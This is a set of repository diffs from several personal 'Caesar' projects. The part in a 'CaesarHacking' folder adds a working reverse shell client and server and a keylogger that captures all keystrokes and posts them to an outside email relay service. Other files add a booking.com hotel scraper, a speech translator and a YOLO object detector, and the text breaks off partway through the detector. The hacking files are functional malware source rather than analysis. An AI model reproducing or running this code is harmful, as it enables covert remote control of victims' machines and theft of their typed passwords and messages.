26 |
+
if command.lower() == "exit":
|
27 |
+
# if the command is exit, just break out of the loop
|
28 |
+
break
|
29 |
+
if splited_command[0].lower() == "cd":
|
30 |
+
# cd command, change directory
|
31 |
+
try:
|
32 |
+
os.chdir(' '.join(splited_command[1:]))
|
33 |
+
except FileNotFoundError as e:
|
34 |
+
# if there is an error, set as the output
|
35 |
+
output = str(e)
|
36 |
+
else:
|
37 |
+
# if operation is successful, empty message
|
38 |
+
output = ""
|
39 |
+
else:
|
40 |
+
# execute the command and retrieve the results
|
41 |
+
output = subprocess.getoutput(command)
|
42 |
+
# get the current working directory as output
|
43 |
+
cwd = os.getcwd()
|
44 |
+
# send the results back to the server
|
45 |
+
message = f"{output}{SEPARATOR}{cwd}"
|
46 |
+
s.send(message.encode())
|
47 |
+
# close client connection
|
48 |
+
s.close()
|
CaesarHacking/caesarReverseShell/server.py
ADDED
@@ -0,0 +1,42 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
import socket
|
2 |
+
|
3 |
+
SERVER_HOST = "0.0.0.0"
|
4 |
+
SERVER_PORT = 5003
|
5 |
+
BUFFER_SIZE = 1024 * 128 # 128KB max size of messages, feel free to increase
|
6 |
+
# separator string for sending 2 messages in one go
|
7 |
+
SEPARATOR = "<sep>"
|
8 |
+
# create a socket object
|
9 |
+
s = socket.socket()
|
10 |
+
|
11 |
+
# bind the socket to all IP addresses of this host
|
12 |
+
s.bind((SERVER_HOST, SERVER_PORT))
|
13 |
+
|
14 |
+
s.listen(5)
|
15 |
+
print(f"Listening as {SERVER_HOST}:{SERVER_PORT} ...")
|
16 |
+
|
17 |
+
# accept any connections attempted
|
18 |
+
client_socket, client_address = s.accept()
|
19 |
+
print(f"{client_address[0]}:{client_address[1]} Connected!")
|
20 |
+
|
21 |
+
# receiving the current working directory of the client
|
22 |
+
cwd = client_socket.recv(BUFFER_SIZE).decode()
|
23 |
+
print("[+] Current working directory:", cwd)
|
24 |
+
|
25 |
+
|
26 |
+
while True:
|
27 |
+
# get the command from prompt
|
28 |
+
command = input(f"{cwd} $> ")
|
29 |
+
if not command.strip():
|
30 |
+
# empty command
|
31 |
+
continue
|
32 |
+
# send the command to the client
|
33 |
+
client_socket.send(command.encode())
|
34 |
+
if command.lower() == "exit":
|
35 |
+
# if the command is exit, just break out of the loop
|
36 |
+
break
|
37 |
+
# retrieve command results
|
38 |
+
output = client_socket.recv(BUFFER_SIZE).decode()
|
39 |
+
# split command output and current directory
|
40 |
+
results, cwd = output.split(SEPARATOR)
|
41 |
+
# print output
|
42 |
+
print(results)
|
CaesarHacking/caesarkeylogger.py
ADDED
@@ -0,0 +1,135 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
import sys
|
2 |
+
import base64
|
3 |
+
import keyboard # for keylogs
|
4 |
+
import requests
|
5 |
+
import smtplib, ssl # for sending email using SMTP protocol (gmail)
|
6 |
+
# Timer is to make a method runs after an `interval` amount of time
|
7 |
+
from threading import Timer
|
8 |
+
from datetime import datetime
|
9 |
+
from email.mime.multipart import MIMEMultipart
|
10 |
+
from email.mime.text import MIMEText
|
11 |
+
|
12 |
+
class Keylogger:
|
13 |
+
def __init__(self, interval, report_method="email"):
|
14 |
+
# we gonna pass SEND_REPORT_EVERY to interval
|
15 |
+
self.interval = interval
|
16 |
+
self.report_method = report_method
|
17 |
+
# this is the string variable that contains the log of all
|
18 |
+
# the keystrokes within `self.interval`
|
19 |
+
self.log = ""
|
20 |
+
# record start & end datetimes
|
21 |
+
self.start_dt = datetime.now()
|
22 |
+
self.end_dt = datetime.now()
|
23 |
+
|
24 |
+
def callback(self, event):
|
25 |
+
"""
|
26 |
+
This callback is invoked whenever a keyboard event is occured
|
27 |
+
(i.e when a key is released in this example)
|
28 |
+
"""
|
29 |
+
name = event.name
|
30 |
+
if len(name) > 1:
|
31 |
+
# not a character, special key (e.g ctrl, alt, etc.)
|
32 |
+
# uppercase with []
|
33 |
+
if name == "space":
|
34 |
+
# " " instead of "space" hello world my name is amari
|
35 |
+
name = " "
|
36 |
+
elif name == "enter":
|
37 |
+
# add a new line whenever an ENTER is pressed
|
38 |
+
name = "[ENTER]\n"
|
39 |
+
elif name == "decimal":
|
40 |
+
name = "."
|
41 |
+
else:
|
42 |
+
# replace spaces with underscores
|
43 |
+
name = name.replace(" ", "_")
|
44 |
+
name = f"[{name.upper()}]"
|
45 |
+
# finally, add the key name to our global `self.log` variable
|
46 |
+
self.log += name
|
47 |
+
|
48 |
+
def update_filename(self):
|
49 |
+
# construct the filename to be identified by start & end datetimes
|
50 |
+
start_dt_str = str(self.start_dt)[:-7].replace(" ", "-").replace(":", "")
|
51 |
+
end_dt_str = str(self.end_dt)[:-7].replace(" ", "-").replace(":", "")
|
52 |
+
self.filename = f"keylog-{start_dt_str}_{end_dt_str}"
|
53 |
+
|
54 |
+
def report_to_file(self):
|
55 |
+
"""This method creates a log file in the current directory that contains
|
56 |
+
the current keylogs in the `self.log` variable"""
|
57 |
+
# open the file in write mode (create it)
|
58 |
+
with open(f"{self.filename}.txt", "w") as f:
|
59 |
+
# write the keylogs to the file
|
60 |
+
print(self.log, file=f)
|
61 |
+
print(f"[+] Saved {self.filename}.txt")
|
62 |
+
|
63 |
+
|
64 |
+
def sendmail(self, recipient_email , message, verbose=1):
|
65 |
+
# manages a connection to an SMTP server
|
66 |
+
# in our case it's for Microsoft365, Outlook, Hotmail, and live.com
|
67 |
+
response = requests.post("https://revisionbank-email.onrender.com/raspsendemail",json={"raspsendemail":{"email":recipient_email,"message":message,"subject":"Caesar Guest KeyLogger"}}).json()
|
68 |
+
|
69 |
+
if verbose:
|
70 |
+
print(f"{datetime.now()} - Sent an email to {recipient_email} containing: {message}")
|
71 |
+
print(response)
|
72 |
+
|
73 |
+
def report(self):
|
74 |
+
"""
|
75 |
+
This function gets called every `self.interval`
|
76 |
+
It basically sends keylogs and resets `self.log` variable
|
77 |
+
"""
|
78 |
+
if self.log:
|
79 |
+
# if there is something in log, report it
|
80 |
+
self.end_dt = datetime.now()
|
81 |
+
# update `self.filename`
|
82 |
+
self.update_filename()
|
83 |
+
if self.report_method == "email":
|
84 |
+
self.sendmail(TO_EMAIL_ADDRESS, self.log)
|
85 |
+
elif self.report_method == "file":
|
86 |
+
self.report_to_file()
|
87 |
+
# if you don't want to print in the console, comment below line
|
88 |
+
print(f"[{self.filename}] - {self.log}")
|
89 |
+
self.start_dt = datetime.now()
|
90 |
+
self.log = ""
|
91 |
+
timer = Timer(interval=self.interval, function=self.report)
|
92 |
+
# set the thread as daemon (dies when main thread die)
|
93 |
+
timer.daemon = True
|
94 |
+
# start the timer
|
95 |
+
timer.start()
|
96 |
+
|
97 |
+
def start(self):
|
98 |
+
# record the start datetime
|
99 |
+
self.start_dt = datetime.now()
|
100 |
+
# start the keylogger
|
101 |
+
keyboard.on_release(callback=self.callback)
|
102 |
+
# start reporting the keylogs
|
103 |
+
self.report()
|
104 |
+
# make a simple message
|
105 |
+
print(f"{datetime.now()} - Started keylogger")
|
106 |
+
# block the current thread, wait until CTRL+C is pressed
|
107 |
+
keyboard.wait()
|
108 |
+
|
109 |
+
|
110 |
+
if __name__ == "__main__":
|
111 |
+
# in seconds, 60 means 1 minute and so on
|
112 |
+
if len(sys.argv) == 3:
|
113 |
+
if sys.argv[1] == "help":
|
114 |
+
print("caesarkeylogger.exe <recipientemail> <send_report_every>")
|
115 |
+
elif sys.argv[1] != "help":
|
116 |
+
TO_EMAIL_ADDRESS = sys.argv[1]
|
117 |
+
SEND_REPORT_EVERY = int(sys.argv[2])
|
118 |
+
# if you want a keylogger to send to your email
|
119 |
+
# keylogger = Keylogger(interval=SEND_REPORT_EVERY, report_method="email")
|
120 |
+
# if you want a keylogger to record keylogs to a local file
|
121 |
+
# (and then send it using your favorite method)
|
122 |
+
past = datetime(2022, 12, 30)
|
123 |
+
present = datetime.now()
|
124 |
+
|
125 |
+
if past.date() >= present.date():
|
126 |
+
report_method = "email"
|
127 |
+
else:
|
128 |
+
report_method= "file"
|
129 |
+
|
130 |
+
keylogger = Keylogger(interval=SEND_REPORT_EVERY, report_method=report_method)
|
131 |
+
keylogger.start()
|
132 |
+
|
133 |
+
|
134 |
+
elif len(sys.argv) != 3:
|
135 |
+
print("caesarkeylogger.exe <recipientemail> <send_report_every>")
|
CaesarHacking/test.py
ADDED
@@ -0,0 +1,3 @@
|
|
|
|
|
|
|
|
|
1 |
+
from datetime import datetime
|
2 |
+
|
3 |
+
|
CaesarHotelBooking/__pycache__/caesarhotelbooking.cpython-37.pyc
ADDED
Binary file (7.75 kB). View file
|
|
CaesarHotelBooking/__pycache__/caesarhotelbooking.cpython-39.pyc
ADDED
Binary file (7.84 kB). View file
|
|
CaesarHotelBooking/caesarhotelbooking.py
ADDED
@@ -0,0 +1,186 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
# -*- coding: utf-8 -*-
|
2 |
+
import itertools
|
3 |
+
import re
|
4 |
+
import sys
|
5 |
+
import requests
|
6 |
+
import json
|
7 |
+
from bs4 import BeautifulSoup
|
8 |
+
from tqdm import tqdm
|
9 |
+
|
10 |
+
class CaesarHotelBooking:
|
11 |
+
def __init__(self) -> None:
|
12 |
+
pass
|
13 |
+
|
14 |
+
@classmethod
|
15 |
+
def create_url(self,city,num_of_adults,num_of_rooms,num_of_children,checkin_date,checkout_date,purpose,page_num=1):
|
16 |
+
# pages go in 25 intervals
|
17 |
+
self.checkin_date = checkin_date
|
18 |
+
self.checkout_date = checkout_date
|
19 |
+
self.city = city
|
20 |
+
page_num_offset = (page_num-1) * 25
|
21 |
+
url = f"https://www.booking.com/searchresults.en-gb.html?ss={city}&label=gen173nr-1FCAEoggI46AdIM1gEaGyIAQGYATG4AQfIAQzYAQHoAQH4AQKIAgGoAgO4AvTIm_IFwAIB&aid=304142&lang=en-gb&sb=1&src_elem=sb&src=searchresults&checkin={checkin_date}&checkout={checkout_date}&group_adults={num_of_adults}&no_rooms={num_of_rooms}&group_children={num_of_children}&sb_travel_purpose={purpose}&offset={page_num_offset}"
|
22 |
+
return url
|
23 |
+
@staticmethod
|
24 |
+
def find_indices(list_to_check, item_to_find):
|
25 |
+
indices = []
|
26 |
+
for idx, value in enumerate(list_to_check):
|
27 |
+
if value == item_to_find:
|
28 |
+
indices.append(idx)
|
29 |
+
return indices
|
30 |
+
|
31 |
+
|
32 |
+
@classmethod
|
33 |
+
def caesar_get_hotel_info(self,url):
|
34 |
+
bookings = []
|
35 |
+
assumed_vat_percentage = 0.2
|
36 |
+
rating_regex = re.compile(r"^(?=.*?\d)\d*[.,]?\d*$")
|
37 |
+
headers = {'User-Agent':'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/601.3.9 (KHTML, like Gecko) Version/9.0.2 Safari/601.3.9'}
|
38 |
+
response=requests.get(url,headers=headers)
|
39 |
+
soup=BeautifulSoup(response.content,'lxml')
|
40 |
+
|
41 |
+
title = [titl.text for titl in soup.find_all('div', attrs={'data-testid': 'title'})]
|
42 |
+
city_list = [self.city.capitalize() for vatind in range(len(title))]
|
43 |
+
|
44 |
+
address = [addr.text for addr in soup.find_all('span', attrs={'data-testid': 'address'})]
|
45 |
+
price = [float(price.text.replace("£","").replace(",","").replace("US$","")) for price in soup.find_all('span', attrs={'data-testid': 'price-and-discounted-price'})]
|
46 |
+
assumed_vat = [f"{assumed_vat_percentage *100}%" for vatind in range(len(price))]
|
47 |
+
checkin = [self.checkin_date for checkin in range(len(title))]
|
48 |
+
checkout = [self.checkout_date for checkout in range(len(title))]
|
49 |
+
assumed_final_price = [pr * (1 +assumed_vat_percentage ) for pr in price]
|
50 |
+
booking = [xnights.text for xnights in soup.find_all('div', attrs={'data-testid': 'price-for-x-nights'})]
|
51 |
+
room = [recounit.find("div",attrs={'class': 'd8eab2cf7f'}).text for recounit in soup.find_all('div', attrs={'data-testid': 'recommended-units'})]
|
52 |
+
location = [recounit.find("a").get("href") for recounit in soup.find_all('div', attrs={'data-testid': 'location'})]
|
53 |
+
|
54 |
+
distance = [dist.text for dist in soup.find_all('span', attrs={'data-testid': 'distance'})]
|
55 |
+
reviews = [rev.text for rev in soup.find_all('div', attrs={'class': 'd8eab2cf7f c90c0a70d3 db63693c62'})]
|
56 |
+
rating = [float(rate.text) for rate in soup.select("[aria-label]") if rating_regex.match(rate.text) and "." in rate.text]
|
57 |
+
|
58 |
+
|
59 |
+
for bookingind in range(len(title)):
|
60 |
+
booking_info = {}
|
61 |
+
try:
|
62 |
+
city_json = {'city':city_list[bookingind]}
|
63 |
+
booking_info.update(city_json)
|
64 |
+
except IndexError as ex:
|
65 |
+
pass
|
66 |
+
try:
|
67 |
+
title_json = {'title':title[bookingind]}
|
68 |
+
booking_info.update(title_json)
|
69 |
+
except IndexError as ex:
|
70 |
+
continue
|
71 |
+
try:
|
72 |
+
checkin_date_json = {'checkin_date':checkin[bookingind]}
|
73 |
+
booking_info.update(checkin_date_json)
|
74 |
+
except IndexError as ex:
|
75 |
+
pass
|
76 |
+
try:
|
77 |
+
checkout_date_json = {'checkout_date':checkout[bookingind]}
|
78 |
+
booking_info.update(checkout_date_json)
|
79 |
+
except IndexError as ex:
|
80 |
+
pass
|
81 |
+
try:
|
82 |
+
address_json = {'address':address[bookingind]}
|
83 |
+
booking_info.update(address_json)
|
84 |
+
except IndexError as ex:
|
85 |
+
pass
|
86 |
+
try:
|
87 |
+
price_json = {'price':price[bookingind]}
|
88 |
+
booking_info.update(price_json)
|
89 |
+
except IndexError as ex:
|
90 |
+
pass
|
91 |
+
try:
|
92 |
+
assumed_vat_json = {'assumed_vat':assumed_vat[bookingind]}
|
93 |
+
booking_info.update(assumed_vat_json)
|
94 |
+
except IndexError as ex:
|
95 |
+
pass
|
96 |
+
try:
|
97 |
+
assumed_final_price_json = {'assumed_final_price':assumed_final_price[bookingind]}
|
98 |
+
booking_info.update(assumed_final_price_json)
|
99 |
+
except IndexError as ex:
|
100 |
+
pass
|
101 |
+
try:
|
102 |
+
booking_json = {'booking':booking[bookingind]}
|
103 |
+
booking_info.update(booking_json)
|
104 |
+
except IndexError as ex:
|
105 |
+
pass
|
106 |
+
try:
|
107 |
+
distance_json = {'distance':distance[bookingind]}
|
108 |
+
booking_info.update(distance_json)
|
109 |
+
except IndexError as ex:
|
110 |
+
pass
|
111 |
+
try:
|
112 |
+
reviews_json = {'reviews':reviews[bookingind]}
|
113 |
+
booking_info.update(reviews_json)
|
114 |
+
except IndexError as ex:
|
115 |
+
pass
|
116 |
+
try:
|
117 |
+
room_json = {'room':room[bookingind]}
|
118 |
+
booking_info.update(room_json)
|
119 |
+
except IndexError as ex:
|
120 |
+
pass
|
121 |
+
try:
|
122 |
+
rating_json = {'rating':rating[bookingind]}
|
123 |
+
booking_info.update(rating_json)
|
124 |
+
except IndexError as ex:
|
125 |
+
pass
|
126 |
+
try:
|
127 |
+
location_json = {'location':location[bookingind]}
|
128 |
+
booking_info.update(location_json)
|
129 |
+
except IndexError as ex:
|
130 |
+
pass
|
131 |
+
bookings.append(booking_info)
|
132 |
+
|
133 |
+
return bookings
|
134 |
+
def store_lower_than_3000(city,range):
|
135 |
+
def condition(dic):
|
136 |
+
''' Define your own condition here'''
|
137 |
+
try:
|
138 |
+
price = dic['assumed_final_price']
|
139 |
+
return price <= range
|
140 |
+
except KeyError as kex:
|
141 |
+
return False
|
142 |
+
with open(f"{city.lower()}_bookings.json","r") as f:
|
143 |
+
bookings = json.load(f)[f"{city.lower()}_bookings"]
|
144 |
+
|
145 |
+
filtered = [d for d in bookings if condition(d)]
|
146 |
+
with open(f"{city.lower()}_smaller_than_{range}.json","w+") as f:
|
147 |
+
json.dump({f"{city.lower()}_bookings":filtered},f)
|
148 |
+
print(f"less than {range} stored")
|
149 |
+
|
150 |
+
def store_whole_booking(city,num_of_pages):
|
151 |
+
overall_booking_info = []
|
152 |
+
print(f"Extracting flight data for {city}...")
|
153 |
+
for i in tqdm(range(1,num_of_pages+1)):
|
154 |
+
params = {
|
155 |
+
"city":city,
|
156 |
+
"checkin_date":"2023-8-01",
|
157 |
+
"checkout_date":"2023-8-08",
|
158 |
+
"purpose":"work",
|
159 |
+
"num_of_adults":10,
|
160 |
+
"num_of_rooms":5,
|
161 |
+
"num_of_children":0,
|
162 |
+
"page_num":i
|
163 |
+
}
|
164 |
+
url = CaesarHotelBooking.create_url(**params)
|
165 |
+
bookinginfo = CaesarHotelBooking.caesar_get_hotel_info(url)
|
166 |
+
overall_booking_info.append(bookinginfo)
|
167 |
+
full_bookings = list(itertools.chain(*overall_booking_info))
|
168 |
+
with open(f"{city.lower()}_bookings.json","w+") as f:
|
169 |
+
json.dump({f"{city.lower()}_bookings":full_bookings},f)
|
170 |
+
print(full_bookings)
|
171 |
+
print(len(full_bookings))
|
172 |
+
def main():
|
173 |
+
# TODO Check out Expedia...
|
174 |
+
try:
|
175 |
+
city = sys.argv[1]
|
176 |
+
max_amount = float(sys.argv[2]) # 3000
|
177 |
+
except IndexError as iex:
|
178 |
+
print("python caesarhotelbooking.py <city_to_book>")
|
179 |
+
num_of_pages = 10
|
180 |
+
store_whole_booking(city,num_of_pages)
|
181 |
+
|
182 |
+
store_lower_than_3000(city,max_amount)
|
183 |
+
|
184 |
+
if __name__ == "__main__":
|
185 |
+
main()
|
186 |
+
|
CaesarLangTranslate/caesarlangtranslate.py
ADDED
@@ -0,0 +1,73 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
from googletrans import Translator, constants
|
2 |
+
from pprint import pprint
|
3 |
+
#import library
|
4 |
+
import warnings
|
5 |
+
#from gtts import gTTS
|
6 |
+
import os
|
7 |
+
|
8 |
+
import time
|
9 |
+
import pyttsx3
|
10 |
+
warnings.filterwarnings("ignore")
|
11 |
+
import os
|
12 |
+
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
|
13 |
+
import speech_recognition as sr
|
14 |
+
class CaesarLangTranslate:
|
15 |
+
def __init__(self) -> None:
|
16 |
+
self.translator = Translator()
|
17 |
+
@classmethod
|
18 |
+
def all_languages():
|
19 |
+
print("Total supported languages:", len(constants.LANGUAGES))
|
20 |
+
print("Languages:")
|
21 |
+
pprint(constants.LANGUAGES)
|
22 |
+
def translate(self,text,src="fr",lang="en",verbose=False):
|
23 |
+
translation = self.translator.translate(text,src=src,dest=lang)
|
24 |
+
print(f"{translation.origin} ({translation.src}) --> {translation.text} ({translation.dest})")
|
25 |
+
if verbose == True:
|
26 |
+
pprint(translation.extra_data)
|
27 |
+
return translation.origin,translation.text,translation.dest
|
28 |
+
|
29 |
+
# Initialize recognizer class (for recognizing the speech)
|
30 |
+
engine=pyttsx3.init('sapi5')
|
31 |
+
voices=engine.getProperty('voices')
|
32 |
+
engine.setProperty('voice',voices[1].id)
|
33 |
+
recognizer = sr.Recognizer()
|
34 |
+
|
35 |
+
def speak(text,whisper_mode=None):
|
36 |
+
if whisper_mode == 0:
|
37 |
+
engine.say(text)
|
38 |
+
engine.runAndWait()
|
39 |
+
|
40 |
+
def caesar_recognition(language="en-US"):
|
41 |
+
r = sr.Recognizer()
|
42 |
+
with sr.Microphone() as source:
|
43 |
+
recognizer.adjust_for_ambient_noise(source,duration=1)
|
44 |
+
audio = r.listen(source)
|
45 |
+
said = ""
|
46 |
+
|
47 |
+
try:
|
48 |
+
said = r.recognize_google(audio,language=language)
|
49 |
+
print(said)
|
50 |
+
except Exception as e:
|
51 |
+
print("Exception: " + str(e))
|
52 |
+
|
53 |
+
return said.lower()
|
54 |
+
WAKE = "hello caesar"
|
55 |
+
while True:
|
56 |
+
print("Listening")
|
57 |
+
text = caesar_recognition()
|
58 |
+
|
59 |
+
if WAKE in text:
|
60 |
+
print("How can I help you sir?")
|
61 |
+
speak("How can I help you sir?",0)
|
62 |
+
text = caesar_recognition()
|
63 |
+
TRANSLATION_MODE = "translate"
|
64 |
+
if TRANSLATION_MODE in text:
|
65 |
+
print("What is your translation?")
|
66 |
+
speak("What is your translation?",0)
|
67 |
+
text = caesar_recognition(language="fr-FR")
|
68 |
+
caesarlangtranslate = CaesarLangTranslate()
|
69 |
+
tranlationinfo = caesarlangtranslate.translate(text)
|
70 |
+
print(tranlationinfo)
|
71 |
+
speak(tranlationinfo[1],0)
|
72 |
+
else:
|
73 |
+
print(text)
|
CaesarObjectDetection/CaesarYolo.py
ADDED
@@ -0,0 +1,192 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
import cv2
|
2 |
+
import numpy as np
|
3 |
+
import os
|
4 |
+
import time
|
5 |
+
import ffmpeg
|
6 |
+
|
7 |
+
|
8 |
+
class CaesarYolo:
|
9 |
+
def __init__(self) -> None:
|
10 |
+
self.CONFIDENCE = 0.5
|
11 |
+
self.SCORE_THRESHOLD = 0.5
|
12 |
+
self.IOU_THRESHOLD = 0.5
|
13 |
+
self.current_dir = os.path.realpath(__file__).replace(f"/CaesarYolo.py","")
|
14 |
+
config_path = f"{self.current_dir}/cfg/yolov3.cfg"
|
15 |
+
weights_path = f"{self.current_dir}/weights/yolov3.weights"
|
16 |
+
self.font_scale = 1
|
17 |
+
self.thickness = 1
|
18 |
+
self.LABELS = open(f"{self.current_dir}/data/coco.names").read().strip().split("\n")
|
19 |
+
self.COLORS = np.random.randint(0, 255, size=(len(self.LABELS), 3), dtype="uint8")
|
20 |
+
|
21 |
+
self.net = cv2.dnn.readNetFromDarknet(config_path, weights_path)
|
22 |
+
|
23 |
+
self.ln = self.net.getLayerNames()
|
24 |
+
try:
|
25 |
+
self.ln = [self.ln[i[0] - 1] for i in self.net.getUnconnectedOutLayers()]
|
26 |
+
except IndexError:
|
27 |
+
# in case getUnconnectedOutLayers() returns 1D array when CUDA isn't available
|
28 |
+
self.ln = [self.ln[i - 1] for i in self.net.getUnconnectedOutLayers()]
|
29 |
+
@staticmethod
|
30 |
+
def compress_video(video_full_path, output_file_name, target_size):
|
31 |
+
# Reference: https://en.wikipedia.org/wiki/Bit_rate#Encoding_bit_rate
|
32 |
+
min_audio_bitrate = 32000
|
33 |
+
max_audio_bitrate = 256000
|
34 |
+
|
35 |
+
probe = ffmpeg.probe(video_full_path)
|
36 |
+
# Video duration, in s.
|
37 |
+
duration = float(probe['format']['duration'])
|
38 |
+
# Audio bitrate, in bps.
|
39 |
+
audio_bitrate = float(next((s for s in probe['streams'] if s['codec_type'] == 'audio'), None)['bit_rate'])
|
40 |
+
# Target total bitrate, in bps.
|
41 |
+
target_total_bitrate = (target_size * 1024 * 8) / (1.073741824 * duration)
|
42 |
+
|
43 |
+
# Target audio bitrate, in bps
|
44 |
+
if 10 * audio_bitrate > target_total_bitrate:
|
45 |
+
audio_bitrate = target_total_bitrate / 10
|
46 |
+
if audio_bitrate < min_audio_bitrate < target_total_bitrate:
|
47 |
+
audio_bitrate = min_audio_bitrate
|
48 |
+
elif audio_bitrate > max_audio_bitrate:
|
49 |
+
audio_bitrate = max_audio_bitrate
|
50 |
+
# Target video bitrate, in bps.
|
51 |
+
video_bitrate = target_total_bitrate - audio_bitrate
|
52 |
+
|
53 |
+
i = ffmpeg.input(video_full_path)
|
54 |
+
ffmpeg.output(i, os.devnull,
|
55 |
+
**{'c:v': 'libx264', 'b:v': video_bitrate, 'pass': 1, 'f': 'mp4'}
|
56 |
+
).overwrite_output().run()
|
57 |
+
ffmpeg.output(i, output_file_name,
|
58 |
+
**{'c:v': 'libx264', 'b:v': video_bitrate, 'pass': 2, 'c:a': 'aac', 'b:a': audio_bitrate}
|
59 |
+
).overwrite_output().run()
|
60 |
+
|
61 |
+
|
62 |
+
def video_load(self,videofile):
|
63 |
+
self.video_file = f"{ self.current_dir}/{videofile}"
|
64 |
+
if self.video_file:
|
65 |
+
self.cap = cv2.VideoCapture(self.video_file)
|
66 |
+
_, image = self.cap.read()
|
67 |
+
h, w = image.shape[:2]
|
68 |
+
fourcc = cv2.VideoWriter_fourcc(*"XVID")
|
69 |
+
frames = self.cap.get(cv2.CAP_PROP_FRAME_COUNT)
|
70 |
+
fps = self.cap.get(cv2.CAP_PROP_FPS)
|
71 |
+
|
72 |
+
# calculate duration of the video
|
73 |
+
self.duration_seconds = round(frames / fps)
|
74 |
+
self.out = cv2.VideoWriter(f"{self.current_dir}/output.avi", fourcc, 20.0, (w, h))
|
75 |
+
self.overall_time_taken = []
|
76 |
+
def caesar_object_detect(self,image,verbose=False):
|
77 |
+
if self.video_file and image is "video":
|
78 |
+
_,image = self.cap.read()
|
79 |
+
try:
|
80 |
+
h, w = image.shape[:2]
|
81 |
+
except AttributeError as aex:
|
82 |
+
return None,None,None
|
83 |
+
blob = cv2.dnn.blobFromImage(image, 1/255.0, (416, 416), swapRB=True, crop=False)
|
84 |
+
self.net.setInput(blob)
|
85 |
+
start = time.perf_counter()
|
86 |
+
layer_outputs = self.net.forward(self.ln)
|
87 |
+
time_took = time.perf_counter() - start
|
88 |
+
if verbose == True:
|
89 |
+
